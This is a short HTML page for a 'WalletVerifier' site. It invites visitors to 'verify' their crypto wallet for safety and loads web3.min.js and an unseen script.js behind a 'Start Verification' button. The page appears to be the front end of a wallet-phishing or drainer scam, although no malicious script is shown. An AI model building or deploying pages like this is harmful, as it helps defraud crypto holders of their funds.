<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Wallet Verifier</title>
  <link rel="stylesheet" href="style.css">
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet">
</head>
<body>

  <header>
    <div class="logo">WalletVerifier</div>
  </header>

  <main>
    <h1>Secure Wallet Asset Check</h1>
    <p>Verify your crypto wallet to ensure your funds are safe and real-time synced.</p>
    <button id="verifyBtn">Start Verification</button>
  </main>

  <footer>
    © 2025 <a href="#">WalletVerifier</a>. All rights reserved.
  </footer>

  <script src="web3.min.js"></script>
  <script src="script.js"></script>

</body>
</html>
